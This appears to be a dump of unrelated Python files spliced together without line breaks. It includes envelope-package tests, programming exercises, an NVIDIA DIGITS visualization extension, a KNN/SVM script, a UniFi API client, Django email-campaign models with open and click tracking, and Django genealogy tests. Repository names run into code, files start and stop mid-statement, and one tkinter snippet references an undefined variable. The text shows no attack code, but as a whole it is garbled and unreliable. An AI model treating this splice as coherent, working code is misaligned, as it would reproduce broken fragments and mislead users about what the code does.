10.0 width1 = 10.0 length1 = 25.0 package = EnvelopePackage() package.add_item(width0,length0,0.5) package.add_item(width1,length1,0.8) dimensions = package.get_dimensions() self.assertTupleEqual(dimensions,(width0,length1)) def test_get_weight_of_envelope_package(self): weight0 = 4.0 weight1 = 9.0 package = EnvelopePackage() package.add_item(5.0,5.0,weight0) package.add_item(15.0,10.0,weight1) self.assertEqual(package.get_weight(),weight0 + weight1) def test_check_for_valid_envelope_package_with_valid_dimensions(self): package = EnvelopePackage() package.add_item(13.0,25.0,0.5) self.assertTrue(package.is_valid()) def test_check_for_valid_envelope_package_with_exceeded_dimensions(self): package = EnvelopePackage() package.add_item(65.0,70.0,0.5) self.assertFalse(package.is_valid()) def test_check_for_valid_envelope_package_with_exceeded_weight(self): package = EnvelopePackage() package.add_item(13.0,25.0,1.2) self.assertFalse(package.is_valid()) def test_api_format_for_valid_envelope_package(self): width = 13.0 length = 25.0 weight = 0.5 package = EnvelopePackage() package.add_item(width,length,weight) expected = { 'nCdFormato': Package.FORMAT_ENVELOPE, 'nVlAltura': 0.0, 'nVlLargura': width, 'nVlComprimento': length, 'nVlPeso': weight } self.assertDictEqual(package.api_format(),expected) def test_api_format_for_invalid_envelope_package(self): package = EnvelopePackage() package.add_item(65.0,70.0,0.5) with self.assertRaises(Exception): package.api_format() knuu/competitive-programming R, G, B, N = map(int, input().split()) ans = 0 for r in range(N + 1): for g in range(N + 1): res = N - r * R - g * G if res >= 0 and res % B == 0: ans += 1 print(ans) ojmakhura/DIGITSdigits/extensions/view/imageOutput/view.py # Copyright (c) 2016-2017, NVIDIA CORPORATION. All rights reserved. import os import PIL.Image import PIL.ImageDraw import digits from digits.utils import subclass, override from .forms import ConfigForm from ..interface import VisualizationInterface CONFIG_TEMPLATE = "config_template.html" VIEW_TEMPLATE = "view_template.html" @subclass class Visualization(VisualizationInterface): """ A visualization extension to display the network output as an image """ def __init__(self, dataset, **kwargs): # memorize view template for later use extension_dir = os.path.dirname(os.path.abspath(__file__)) self.view_template = open( os.path.join(extension_dir, VIEW_TEMPLATE), "r").read() # view options self.channel_order = kwargs['channel_order'].upper() self.data_order = kwargs['data_order'].upper() self.normalize = (kwargs['pixel_conversion'] == 'normalize') self.show_input = (kwargs['show_input'] == 'yes') @staticmethod def get_config_form(): return ConfigForm() @staticmethod def get_config_template(form): """ parameters: - form: form returned by get_config_form(). This may be populated with values if the job was cloned returns: - (template, context) tuple - template is a Jinja template to use for rendering config options - context is a dictionary of context variables to use for rendering the form """ extension_dir = os.path.dirname(os.path.abspath(__file__)) template = open( os.path.join(extension_dir, CONFIG_TEMPLATE), "r").read() return (template, {'form': form}) @staticmethod def get_id(): return 'image-image-output' @staticmethod def get_title(): return 'Image output' @override def get_view_template(self, data): """ returns: - (template, context) tuple - template is a Jinja template to use for rendering config options - context is a dictionary of context variables to use for rendering the form """ return self.view_template, {'image_input': digits.utils.image.embed_image_html(data[0]), 'image_output': digits.utils.image.embed_image_html(data[1])} @override def process_data(self, input_id, input_data, output_data): """ Process one inference and return data to visualize """ if self.show_input: data_input = input_data.astype('float32') image_input = self.process_image(self.data_order, data_input) else: image_input = None data_output = output_data[list(output_data.keys())[0]].astype('float32') image_output = self.process_image(self.data_order, data_output) return [image_input, image_output] def process_image(self, data_order, data): if data_order == 'HWC': data = (data.transpose((2, 0, 1))) # assume CHW at this point channels = data.shape[0] if channels == 3 and self.channel_order == 'BGR': data = data[[2, 1, 0], ...] # BGR to RGB # convert to HWC data = data.transpose((1, 2, 0)) # assume 8-bit if self.normalize: data -= data.min() if data.max() > 0: data /= data.max() data *= 255 else: # clip data = data.clip(0, 255) # convert to uint8 data = data.astype('uint8') # convert to PIL image if channels == 1: # drop channel axis image = PIL.Image.fromarray(data[:, :, 0]) elif channels == 3: image = PIL.Image.fromarray(data) else: raise ValueError("Unhandled number of channels: %d" % channels) return image YuriyAksenov/Knn-and-Svm-classifier0 from DataAnalyzer import DataAnalyzer from Data import Data from SvmClassifier import * import numpy as np import random from Metrics import * from KnnClassifier import * from SvmClassifier import * # можно увеличить простарнства в knn путем применения лангранжа. А потом при предикте брать те веса, которые посчитали для лангранжа, точку проецировать. И брать соседей fileName = 'Chips.txt' data = Data.read_points_from_file(fileName) random.shuffle(data) random.shuffle(data) random.shuffle(data) random.shuffle(data) random.shuffle(data) random.shuffle(data) # Data.show_data(data) fknn, knnPredict = DataAnalyzer.analyze_knn_one(data, numFolds = 10) fsvm, svmPredict = DataAnalyzer.analyze_svm_one(data, numFolds =10) print("fscores --------------- ") print(fknn) print(fsvm) test = Metrics.t_test_empirical(fknn, fsvm) print("TEST --------------- ") print(test) print("p value --------------- ") p = Metrics.p_value(knnPredict, svmPredict, 2) print(p) # random.shuffle(data) # random.shuffle(data) # random.shuffle(data) # random.shuffle(data) # random.shuffle(data) # x = np.array([[item.x, item.y] for item in data]) # y = np.array([-1 if item.label == 0 else 1 for item in data]) # x_train = x[:100] # y_train = y[:100] # x_test = x[100:] # y_test = y[100:] # svm = SvmClassifier(C=1, kernel=polynomial_kernel) # svm.fit(x_train,y_train) # res = svm.predict(x_test) # res = np.array([0 if item == -1 else 1 for item in res]) # y_test = np.array([0 if item == -1 else 1 for item in y_test]) # print(res) # f = Metrics.f_score(y_test, res); # print('-------------------------------') # print(f) svm_print = """ SVM --------------------------------------------------------- Max f_score general | numFold:4 | kernel: | 0.6008 | 0.7325 | improved| Max p value general | numFold:4 | kernel: | 0.6008 | 0.7325 | improved| Max t Wilcoxon general | numFold:4 | kernel: | 0.6008 | 0.7325 | improved| SVM --------------------------------------------------------- """ knn_print = """ KNN --------------------------------------------------------- Max f_score general | numFold:4 | numNeighbor:6 | power:2 | kernel:KernelType.E | CoordinateSystem.Cartesian | 0.6989 | 0.9000 | improved | Max p value general | numFold:4 | numNeighbor:6 | power:2 | kernel:KernelType.E | CoordinateSystem.Cartesian | 0.6989 | 0.9000 | improved | Max t Wilcoxon general | numFold:4 | numNeighbor:6 | power:2 | kernel:KernelType.E | CoordinateSystem.Cartesian | 0.6989 | 0.9000 | improved | KNN --------------------------------------------------------- """ weird_algorithm.py0 # this is my solution for weird algorithm question of CSES problem set n = int(input()) while n!=1: print(n,end=" ") if n%2 == 0: n = int(n/2) else: n = int(3*n+1) print('1')from unifi.lowlevel import LowLevelApi from unifi.mixins import * class UnifiController(LowLevelApi, NetworkApiMixin): def __init__(self, base_url): super(UnifiController, self).__init__(base_url) self.__is_unifi_os = self.__identify_unifi_os() def __identify_unifi_os(self): r = self._request('/api/system', anonymous=True, throw_unless=[]) return r.status_code == 200 def login(self, username, password): r = self._request('/api/auth/login' if self.__is_unifi_os else '/api/login', anonymous=True, json={'username': username, 'password': password}, #, 'strict': True, 'remember': False}, throw_unless=[]) self._logged_in = r.status_code == 200 return self._logged_in def logout(self): r = self._request('/api/auth/logout' if self.__is_unifi_os else '/api/logout', json={}, throw_unless=[]) if r.status_code == 200: self._logged_in = False return True return False @property def is_unifi_os(self): return self.__is_unifi_os def user(self, user='self', site='default'): r = self._request('/api/users/{user}' if self.__is_unifi_os else '/api/s/{site}/{user}', path_params={'user': user, 'site': site}) return r.json() 1-10 # Autho : # Ref : freeCodeCamp.org ( youtube ) def for_string(): "perulangan string" for letter in "": print(letter) def for_list(): "perulangan list" friends = ["Jim", "Karen", "Kevin"] for friend in friends: print(friend) def for_list_range(): "perulangan list menggunakan fungsi range dan len" friends = ["Jim", "Karen", "Kevin"] # tipe list bisa di akses dengan menggunakan indeks, dimulai dari 0 # belum menampilkan string di dalam list, hanya mengambil indeks nya saja for index in range(len(friends)): # fungsi range untuk mengambil semua data dari list # dimulai dari 0 sampai N data # jika print(index), maka hanya akan tampil indesknya saja print(friends[index]) # gunakan variabel yang bertipe list untuk menampilkan data di dalamnya ( ex : nama) # kemudian di ikuti index untuk perulangan di dalam sebanyak data di dalam list def for_itterarion(): "iterasi dalam for" for index in range(5): if index == 0: print("first iteration") elif index == 1: print("second iteration") else: print("not first and second") def for_list_dimension(): # membaca baris dan kolom, representasi dari tipe data list number_grid = [ [1, 2, 3], # baris 1 [4, 5, 6], # baris 2 [7, 8, 9], # baris 3 [0] # baris 4 ] # print(number_grid[0][0]) # ambil baris pertama kolom pertamas for row in number_grid: # ambil semua baris dan kolom / masih dalam bentuk per list / per baris print(row) for row in number_grid: for col in row: print(col) # ambil semua baris untuk di tampilkan satu persatu if __name__ == "__main__": # for_string() # for_list() # for_list_range() # for_itterarion() for_list_dimension() # -*- coding: utf-8 -*- #this document is used to obtain the absolute and relative error of each key performance #indicators corresponding to a specific od, and get some key performance indicators of the #whole model import pandas as pd import math filename_base_route = 'D:\\document\\matching probability\\data\\version2\\route\\' filename_base_route_error = 'D:\\document\\matching probability\\data\\version2\\route_error\\' filename_base_result = 'D:\\document\\matching probability\\data\\version2\\result\\' column_names = ['seeker_probability', 'taker_waiting_probability', 'taker_traveling_probability', 'whole_matching_probability', 'traveling_distance', 'shared_distance', 'save_distance'] name_prefixes = ['theory_', 'simulation_'] error_prefixes = ['absolute_', 'relative_'] #obtain absolute and relative error for each od def get_absolute_and_relative_error_for_each_od(od_index): filename = filename_base_route + str(od_index) + '.csv' df_od = pd.read_csv(filename, sep = ',') for column_name in column_names: df_od['temp'] = df_od['theory_' + column_name] - df_od['simulation_' + column_name] df_od['absolute_' + column_name] = df_od['temp'].map(lambda x : abs(x)) df_od['relative_' + column_name] = df_od['absolute_' + column_name]/df_od['simulation_' + column_name] df_od['relative_' + column_name] = df_od['relative_' + column_name].map(lambda x : 0 if x > 10000 else x) filename_error = filename_base_route_error + str(od_index) + '.csv' df_od.to_csv(filename_error, sep = ',', index = False) return df_od #obtain the key performance indicators for each od def get_key_performance_indicators_for_each_od(df, od_index): column_names_method = ['whole_matching_probability', 'shared_distance', 'save_distance', 'traveling_distance'] df_od = get_absolute_and_relative_error_for_each_od(od_index) #filename_error = filename_base_route_error + str(od_index) + '.csv' #df_od = pd.read_csv(filename_error, sep = ',') convergent_senario_number = len(df_od) for column_name_temp in column_names_method: df_od['temp'] = df_od['absolute_' + column_name_temp].map(lambda x : x * x) sum_temp = sum(df_od['temp'].values.tolist()) df.loc[od_index, 'rmse_' + column_name_temp] = math.sqrt(sum_temp/convergent_senario_number) sum_temp_mape = sum(df_od['relative_' + column_name_temp].values.tolist()) df.loc[od_index, 'mape_' + column_name_temp] = 100 * sum_temp_mape/convergent_senario_number return df def get_key_performance_indicators_for_all_ods(): extra_term = 'rmse_mape.csv' column_names_method = ['whole_matching_probability', 'shared_distance', 'save_distance', 'traveling_distance'] prefixes = ['rmse_', 'mape_'] columns = [] for column_name in column_names_method: for prefix in prefixes: columns.append(prefix + column_name) df_result = pd.DataFrame(columns = columns) for od_index in range(300): df_result = get_key_performance_indicators_for_each_od(df_result, od_index) filename = filename_base_result + extra_term df_result.to_csv(filename, sep = ',', index = False) if __name__ == "__main__": get_key_performance_indicators_for_all_ods() import unittest from .delete import Delete from ..mocks import Models, InputOutput from ..column_types import String, Integer from ..input_requirements import Required, MaximumLength from ..authentication import Public, SecretBearer from ..di import StandardDependencies class DeleteTest(unittest.TestCase): def setUp(self): Models.reset() self.models = Models({ 'name': {'class': String, 'input_requirements': [Required]}, 'email': {'class': String, 'input_requirements': [Required, (MaximumLength, 15)]}, 'age': {'class': Integer}, }) self.models.add_search_response([{'id': 5, 'name': 'Conor', 'email': '', 'age': 10}]) self.di = StandardDependencies() def test_delete_flow(self): delete = Delete(self.di) delete.configure({ 'models': self.models, 'authentication': Public(), }) response = delete(InputOutput(body={'id': '5'})) self.assertEquals('success', response[0]['status']) self.assertEquals(200, response[1]) deleted = Models.deleted[0] self.assertEquals(5, deleted['id']) condition = Models.iterated[0]['wheres'][0] self.assertEquals('id', condition['column']) self.assertEquals(['5'], condition['values']) self.assertEquals('=', condition['operator']) def test_documentation(self): delete = Delete(self.di) delete.configure({ 'models': self.models, 'authentication': Public(), }) documentation = delete.documentation()[0] self.assertEquals(0, len(documentation.parameters)) self.assertEquals(2, len(documentation.responses)) self.assertEquals([200, 404], [response.status for response in documentation.responses]) success_response = documentation.responses[0] self.assertEquals( ['status', 'data', 'pagination', 'error', 'inputErrors'], [schema.name for schema in success_response.schema.children] ) CreativeWurks/emailerpro import json import re import uuid from typing import Optional from django.apps import apps from django.contrib.sites.shortcuts import get_current_site from django.db import models, transaction from django.db.models import Count, QuerySet from django.template import Context, Template from django.urls import reverse from django.utils import timezone from django.utils.crypto import get_random_string from django.utils.translation import gettext, gettext_lazy as _ from bs4 import BeautifulSoup from colossus.apps.lists.models import MailingList from colossus.apps.subscribers.constants import ActivityTypes from colossus.apps.templates.models import EmailTemplate from colossus.apps.templates.utils import get_template_blocks from .constants import CampaignStatus, CampaignTypes from .tasks import send_campaign_task, update_rates_after_campaign_deletion class Campaign(models.Model): uuid = models.UUIDField(default=uuid.uuid4, unique=True, editable=False) name = models.CharField(_('name'), max_length=100) campaign_type = models.PositiveSmallIntegerField( _('type'), choices=CampaignTypes.CHOICES, default=CampaignTypes.REGULAR ) mailing_list = models.ForeignKey( MailingList, on_delete=models.CASCADE, verbose_name=_('mailing list'), related_name='campaigns', null=True, blank=True ) tag = models.ForeignKey( 'subscribers.Tag', on_delete=models.SET_NULL, verbose_name=_('tag'), related_name='campaigns', null=True, blank=True ) status = models.PositiveSmallIntegerField( _('status'), choices=CampaignStatus.CHOICES, default=CampaignStatus.DRAFT, db_index=True ) send_date = models.DateTimeField(_('send date'), null=True, blank=True, db_index=True) create_date = models.DateTimeField(_('create date'), auto_now_add=True) update_date = models.DateTimeField(_('update date'), default=timezone.now) recipients_count = models.PositiveIntegerField(default=0) track_opens = models.BooleanField(_('track opens'), default=True) track_clicks = models.BooleanField(_('track clicks'), default=True) unique_opens_count = models.PositiveIntegerField(_('unique opens'), default=0, editable=False) total_opens_count = models.PositiveIntegerField(_('total opens'), default=0, editable=False) unique_clicks_count = models.PositiveIntegerField(_('unique clicks'), default=0, editable=False) total_clicks_count = models.PositiveIntegerField(_('total clicks'), default=0, editable=False) open_rate = models.FloatField(_('opens'), default=0.0, editable=False) click_rate = models.FloatField(_('clicks'), default=0.0, editable=False) __cached_email = None class Meta: verbose_name = _('campaign') verbose_name_plural = _('campaigns') db_table = 'colossus_campaigns' def __str__(self): return self.name def get_absolute_url(self) -> str: if self.can_edit: return reverse('campaigns:campaign_edit', kwargs={'pk': self.pk}) elif self.is_scheduled: return reverse('campaigns:campaign_scheduled', kwargs={'pk': self.pk}) return reverse('campaigns:campaign_detail', kwargs={'pk': self.pk}) def delete(self, using=None, keep_parents=False): super().delete(using, keep_parents) update_rates_after_campaign_deletion.delay(self.mailing_list_id) @property def is_scheduled(self) -> bool: return self.status == CampaignStatus.SCHEDULED @property def can_edit(self) -> bool: return self.status == CampaignStatus.DRAFT @property def can_send(self) -> bool: for email in self.emails.all(): if not email.can_send: return False else: return True @property def email(self) -> Optional['Email']: if not self.__cached_email and self.campaign_type == CampaignTypes.REGULAR: try: self.__cached_email, created = Email.objects.get_or_create(campaign=self) except Email.MultipleObjectsReturned: self.__cached_email = self.emails.order_by('id').first() return self.__cached_email def get_recipients(self): queryset = self.mailing_list.get_active_subscribers() if self.tag is not None: queryset = queryset.filter(tags=self.tag) return queryset def send(self): with transaction.atomic(): self.recipients_count = self.get_recipients().count() self.send_date = timezone.now() self.status = CampaignStatus.QUEUED for email in self.emails.select_related('template').all(): if email.template is not None: email.template.last_used_date = timezone.now() email.template.last_used_campaign_id = self.pk email.template.save() self.save() send_campaign_task.delay(self.pk) @transaction.atomic def replicate(self): copy = gettext(' (copy)') slice_at = 100 - len(copy) name = '%s%s' % (self.name[:slice_at], copy) replicated_campaign = Campaign.objects.create( name=name, campaign_type=self.campaign_type, mailing_list=self.mailing_list, status=CampaignStatus.DRAFT, ) replicated_emails = list() for email in self.emails.all(): replicated_email = Email( campaign=replicated_campaign, template=email.template, template_content=email.template_content, from_email=email.from_email, from_name=email.from_name, subject=email.subject, preview=email.preview, content=email.content, content_html=email.content_html, content_text=email.content_text ) replicated_emails.append(replicated_email) Email.objects.bulk_create(replicated_emails) return replicated_campaign def update_clicks_count_and_rate(self) -> tuple: Activity = apps.get_model('subscribers', 'Activity') qs = Activity.objects.filter(email__campaign=self, activity_type=ActivityTypes.CLICKED) \ .values('subscriber_id') \ .order_by('subscriber_id') \ .aggregate(unique_count=Count('subscriber_id', distinct=True), total_count=Count('subscriber_id')) self.unique_clicks_count = qs['unique_count'] self.total_clicks_count = qs['total_count'] try: self.click_rate = self.unique_clicks_count / self.recipients_count except ZeroDivisionError: self.click_rate = 0.0 self.save(update_fields=['unique_clicks_count', 'total_clicks_count', 'click_rate']) return (self.unique_clicks_count, self.total_clicks_count, self.click_rate) def update_opens_count_and_rate(self) -> tuple: Activity = apps.get_model('subscribers', 'Activity') qs = Activity.objects.filter(email__campaign=self, activity_type=ActivityTypes.OPENED) \ .values('subscriber_id') \ .order_by('subscriber_id') \ .aggregate(unique_count=Count('subscriber_id', distinct=True), total_count=Count('subscriber_id')) self.unique_opens_count = qs['unique_count'] self.total_opens_count = qs['total_count'] try: self.open_rate = self.unique_opens_count / self.recipients_count except ZeroDivisionError: self.open_rate = 0.0 self.save(update_fields=['unique_opens_count', 'total_opens_count', 'open_rate']) return (self.unique_opens_count, self.total_opens_count, self.open_rate) def get_links(self) -> QuerySet: """ A method to list campaign's links :return: All links associated with the campaign, ordered by the total number of clicks """ links = Link.objects.filter(email__campaign=self).order_by('-total_clicks_count') return links class Email(models.Model): uuid = models.UUIDField(default=uuid.uuid4, unique=True, editable=False) campaign = models.ForeignKey(Campaign, on_delete=models.CASCADE, verbose_name=_('campaign'), related_name='emails') template = models.ForeignKey( EmailTemplate, on_delete=models.SET_NULL, verbose_name=_('email template'), related_name='emails', null=True, blank=True ) template_content = models.TextField(_('email template content'), blank=True) from_email = models.EmailField(_('email address')) from_name = models.CharField(_('name'), max_length=100, blank=True) subject = models.CharField(_('subject'), max_length=150) preview = models.CharField(_('preview'), max_length=150, blank=True) content = models.TextField(_('content'), blank=True) content_html = models.TextField(_('content HTML'), blank=True) content_text = models.TextField(_('content plain text'), blank=True) unique_opens_count = models.PositiveIntegerField(_('unique opens'), default=0, editable=False) total_opens_count = models.PositiveIntegerField(_('total opens'), default=0, editable=False) unique_clicks_count = models.PositiveIntegerField(_('unique clicks'), default=0, editable=False) total_clicks_count = models.PositiveIntegerField(_('total clicks'), default=0, editable=False) __blocks = None __base_template = None __child_template_string = None BASE_TEMPLATE_VAR = 'base_template' class Meta: verbose_name = _('email') verbose_name_plural = _('emails') db_table = 'colossus_emails' def __str__(self): return self.subject @property def base_template(self) -> Template: if self.__base_template is None: self.__base_template = Template(self.template_content) return self.__base_template @property def child_template_string(self) -> str: if self.__child_template_string is None: self.__child_template_string = self.build_child_template_string() return self.__child_template_string def set_template_content(self): if self.template is None: self.template_content = EmailTemplate.objects.default_content() else: self.template_content = self.template.content def get_from(self) -> str: if self.from_name: return '%s <%s>' % (self.from_name, self.from_email) return self.from_email def get_base_template(self) -> Template: """ Retuns a Django template using `template_content` field. Fallback to default basic template defined by EmailTemplate. """ if self.template_content: template = Template(self.template_content) else: template_string = EmailTemplate.objects.default_content() template = Template(template_string) return template def set_blocks(self, blocks=None): if blocks is None: old_blocks = self.get_blocks() blocks = dict() template = self.get_base_template() template_blocks = get_template_blocks(template) for block_name, block_content in template_blocks.items(): inherited_content = block_content if block_name in old_blocks.keys(): old_block_content = old_blocks.get(block_name, '').strip() if old_block_content: inherited_content = old_blocks[block_name] blocks[block_name] = inherited_content self.content = json.dumps(blocks) self.__blocks = blocks def load_blocks(self) -> dict: try: blocks = json.loads(self.content) except (TypeError, json.JSONDecodeError): blocks = {'content': ''} return blocks def get_blocks(self) -> dict: if self.__blocks is None: self.__blocks = self.load_blocks() return self.__blocks def checklist(self) -> dict: _checklist = { 'recipients': False, 'from': False, 'subject': False, 'content': False, 'unsub': False } if self.campaign.mailing_list is not None and self.campaign.mailing_list.get_active_subscribers().exists(): _checklist['recipients'] = True if self.from_email: _checklist['from'] = True if self.subject: _checklist['subject'] = True if self.content: _checklist['content'] = True # Generate a random string and pass it to the render function # as if it was the unsubscribe url. If we can find this token in the # rendered template, we can say the unsubscribe url will be rendered. # Not 100% guranteed, as the end user can still bypass it (e.g. # changing visibility with html). token = get_random_string(50) rendered_template = self.render({'unsub': token}) _checklist['unsub'] = token in rendered_template return _checklist @property def can_send(self) -> bool: checklist = self.checklist() for value in checklist.values(): if not value: return False else: return True def build_child_template_string(self) -> str: """ Build a valid Django template string with `extends` block tag on top and representation of each content blocks, constructed from the JSON object. """ virtual_template = ['{%% extends %s %%}' % self.BASE_TEMPLATE_VAR, ] blocks = self.get_blocks() for block_key, block_content in blocks.items(): if block_content: virtual_template.append('{%% block %s %%}\n%s\n{%% endblock %%}' % (block_key, block_content)) return '\n\n'.join(virtual_template) def _render(self, template_string, context_dict) -> str: template = Template(template_string) context = Context(context_dict) return template.render(context) def render(self, context_dict) -> str: context_dict.update({self.BASE_TEMPLATE_VAR: self.base_template}) return self._render(self.child_template_string, context_dict) def _enable_click_tracking(self, html, index=0): urls = re.findall(r'(?i)(href=["\']?)(https?://[^"\' >]+)', html) for data in urls: href = data[0] url = data[1] link, created = Link.objects.get_or_create(email=self, url=url, index=index) current_site = get_current_site(request=None) protocol = 'http' domain = current_site.domain # We cannot use django.urls.reverse here because part of the kwargs # will be processed during the sending campaign (including the `subscriber_uuid`) # With the `{{ uuid }}` we are introducing an extra django template variable # which will be later used to replace with the subscriber's uuid. track_url = '%s://%s/track/click/%s/{{uuid}}/' % (protocol, domain, link.uuid) html = html.replace('%s%s' % (href, url), '%s%s' % (href, track_url), 1) index += 1 return html, index def enable_click_tracking(self): self.template_content, index = self._enable_click_tracking(self.template_content) blocks = self.get_blocks() for key, html in blocks.items(): blocks[key], index = self._enable_click_tracking(html, index) self.set_blocks(blocks) def enable_open_tracking(self): current_site = get_current_site(request=None) protocol = 'http' domain = current_site.domain track_url = '%s://%s/track/open/%s/{{uuid}}/' % (protocol, domain, self.uuid) soup = BeautifulSoup(self.template_content, 'html.parser') img_tag = soup.new_tag('img', src=track_url, height='1', width='1') body = soup.find('body') if body is not None: body.append(img_tag) self.template_content = str(soup) else: self.template_content = '%s %s' % (self.template_content, img_tag) def update_clicks_count(self) -> tuple: qs = self.activities.filter(activity_type=ActivityTypes.CLICKED) \ .values('subscriber_id') \ .order_by('subscriber_id') \ .aggregate(unique_count=Count('subscriber_id', distinct=True), total_count=Count('subscriber_id')) self.unique_clicks_count = qs['unique_count'] self.total_clicks_count = qs['total_count'] self.save(update_fields=['unique_clicks_count', 'total_clicks_count']) return (self.unique_clicks_count, self.total_clicks_count) def update_opens_count(self) -> tuple: qs = self.activities.filter(activity_type=ActivityTypes.OPENED) \ .values('subscriber_id') \ .order_by('subscriber_id') \ .aggregate(unique_count=Count('subscriber_id', distinct=True), total_count=Count('subscriber_id')) self.unique_opens_count = qs['unique_count'] self.total_opens_count = qs['total_count'] self.save(update_fields=['unique_opens_count', 'total_opens_count']) return (self.unique_opens_count, self.total_opens_count) class Link(models.Model): uuid = models.UUIDField(default=uuid.uuid4, unique=True, editable=False) email = models.ForeignKey( Email, on_delete=models.SET_NULL, null=True, related_name='links', verbose_name=_('email') ) url = models.URLField(_('URL'), max_length=2048) unique_clicks_count = models.PositiveIntegerField(_('unique clicks count'), default=0, editable=False) total_clicks_count = models.PositiveIntegerField(_('total clicks count'), default=0, editable=False) index = models.PositiveSmallIntegerField(_('index'), default=0) class Meta: verbose_name = _('link') verbose_name_plural = _('links') db_table = 'colossus_links' def __str__(self) -> str: return self.url def delete(self, using=None, keep_parents=False): """ Prevent links from being deleted after they are sent. Otherwise it may cause broken links in the emails. """ if self.can_delete: return super().delete(using, keep_parents) @property def can_delete(self) -> bool: """ Determines if the link can be deleted or not. First check if the email field is null. It should never be null unless the campaign was deleted by the user and all relationship cascaded. Except for the link as it should set to null. In that case, assume that the email/campaign was already sent, as the links are created during the sending process. The other case is when email is not null, so we can check the status of the campaign. :return: True if it's safe to delete the link, False otherwise. """ if self.email is None or self.email.campaign.status != CampaignStatus.DRAFT: return False return True @property def short_uuid(self) -> str: """ A short identifier to be used in the links reports. :return: The first eight characters of the link UUID. """ return str(self.uuid)[:8] def update_clicks_count(self) -> tuple: """ Query the database and update the link click statistics based on subscribers activities. :return: A tuple containing two values: unique clicks and total clicks """ qs = self.activities.values('subscriber_id').order_by('subscriber_id').aggregate( unique_count=Count('subscriber_id', distinct=True), total_count=Count('subscriber_id') ) self.unique_clicks_count = qs['unique_count'] self.total_clicks_count = qs['total_count'] self.save(update_fields=['unique_clicks_count', 'total_clicks_count']) return (self.unique_clicks_count, self.total_clicks_count) from ea_interop_service_source.b_code.i_dual_objects.stereotypes.i_stereotype import IStereotype class INullStereotype( IStereotype): def __init__( self): IStereotype.__init__( self) pass FullAxis_GUI/config/test2.py from tkinter import * from tkinter import ttk root = Tk() note = ttk.Notebook(root) variables = {} for name, colour, shape in Applist: variables[name + "_n"] = name tab = Frame(note) d=note.add(tab, text = "ddd") #Button(root, text='+', command=add).grid(row=1, column=1) note.grid(row=1) root.mainloop()# from .coco import COCO # from .voc import VOC # from .ade20k import ADE20K # from .cityscapes import CityScapes from .voc1 import VOC 0 import pytest from django.contrib.auth import get_user_model from mixer.backend.django import mixer from person_app.models import Person, Birth from core.models import ( DateTime, GivName, SurName, SURNAME_DICT, ) pytestmark = pytest.mark.django_db class TestBirth: def test_birth(self): instance = mixer.blend(Birth) assert instance assert instance.pk def test_person(self): person = mixer.blend(Person) birth = mixer.blend(Birth) birth.person = person.pk birth.save() assert birth.person == person person = mixer.blend(Person) birth.person = person birth.save() assert birth.person == person def test_givname_getter(self): birth = mixer.blend(Birth) assert not birth.givname birth._givname = GivName.objects.create(givname='abc') birth.save() assert birth.givname == 'abc' def test_givname_setter(self): birth = mixer.blend(Birth) assert birth._givname is None # Argument is str birth.givname = 'Yyyий' birth.save() assert birth._givname.givname == 'Yyyий' birth.givname = None birth.save() assert birth._givname is None # Argument is GivName birth.givname = GivName.objects.create(givname='Yyyий') birth.save() assert birth._givname.givname == 'Yyyий' birth.givname = None birth.save() assert birth._givname is None def test_surname_getter(self): birth = mixer.blend(Birth) assert birth.surname == '' # Male birth.gender = 'M' birth._surname = SurName.objects.create( _surname_male='Yyyий', _surname_female='Xxxая', ) birth.save() assert birth.surname == 'Yyyий' # Female birth.gender = 'F' birth.save() assert birth.surname == 'Xxxая' def test_surname_setter(self): birth = mixer.blend(Birth) assert birth._surname is None # Male birth.gender = 'M' # Argument is str birth.surname = 'Yyyий' birth.save() assert birth._surname._surname_male == 'Yyyий' birth.surname = None birth.save() assert birth._surname is None # Argument is SurName birth.surname = SurName.objects.create(_surname_male='Yyyий') birth.save() assert birth._surname._surname_male == 'Yyyий' birth.surname = None birth.save() assert birth._surname is None # Female birth.gender = 'F' # Argument is str birth.surname = 'Xxxая' birth.save() assert birth._surname._surname_female == 'Xxxая' birth.surname = None birth.save() assert birth._surname is None # Argument is SurName birth.surname = SurName.objects.create(_surname_female='Xxxая') birth.save() assert birth._surname._surname_female == 'Xxxая' birth.surname = None birth.save() assert birth._surname is None dt_data = { 'year': 2000, 'month': 6, 'day': 15, 'hour': 12, 'minute': 30, } def test_datetime_getter(self): birth = mixer.blend(Birth) assert not birth._datetime obj = mixer.blend(DateTime) for key in self.dt_data: value = self.dt_data.get(key) setattr(obj, key, value) obj.save() birth._datetime = obj assert birth.datetime == self.dt_data def test_datetime_setter(self): birth = mixer.blend(Birth) assert birth._datetime is None birth.datetime = self.dt_data birth.save() for key in self.dt_data: value = self.dt_data.get(key) assert getattr(birth._datetime, key, value) == value birth.datetime = None birth.save() assert birth._datetime is None def test_link(self): data = { 'givname': [GivName, 'Иван', '_givname'], 'surname': [SurName, 'Иванов', '_surname'], 'datetime': [DateTime, self.dt_data, '_datetime'], #'datetime': [DateTime, {}, '_datetime'], } for key in data: obj = data.get(key)[0] value = data.get(key)[1] _ = data.get(key)[2] birth = mixer.blend(Birth) bpk1 = birth.pk setattr(birth, key, value) birth.save() assert obj.objects.all().count() == 1 assert obj.objects.filter(link=1).count() == 1 birth = mixer.blend(Birth) bpk2 = birth.pk setattr(birth, key, value) birth.save() assert obj.objects.all().count() == 1 assert obj.objects.filter(link=2).count() == 1 birth = Birth.objects.get(pk=bpk1) setattr(birth, key, None) birth.save() assert obj.objects.all().count() == 1 assert obj.objects.filter(link=1).count() == 1 Birth.objects.get(pk=bpk2).delete() assert obj.objects.all().count() == 0 if hasattr(obj, 'note'): instance = mixer.blend(obj) instance.note = 'Hello' instance.save() birth = Birth.objects.get(pk=bpk1) setattr(birth, key, value) birth.save() assert obj.objects.get(link=1) birth = mixer.blend(Birth) bpk2 = birth.pk birth = Birth.objects.get(pk=bpk2) setattr(birth, key, value) birth.save() assert obj.objects.get(link=2) Birth.objects.get(pk=bpk2).delete() assert obj.objects.get(link=1) birth = Birth.objects.get(pk=bpk1) setattr(birth, key, None) birth.save() assert obj.objects.get(link=0) assert obj.objects.all().count() == 1 o = obj.objects.get(link=0) o.note = '' o.save() obj.objects.all().delete() def test_likes(self): user1 = mixer.blend(get_user_model()) user2 = mixer.blend(get_user_model()) obj = Birth.objects.create( person=mixer.blend(Person), ) obj._likes.add(user1) assert obj.likes == 1 obj._likes.add(user2) assert obj.likes == 2 obj._likes.remove(user1) assert obj.likes == 1 obj._likes.remove(user2) assert obj.likes == 0 def test_save(self): birth1 = Birth.objects.create( givname="Иван", surname="Иванов" ) assert Person.objects.all().count() == 1 person = Person.objects.get(pk=birth1.pk) birth2 = Birth.objects.create( person=person, 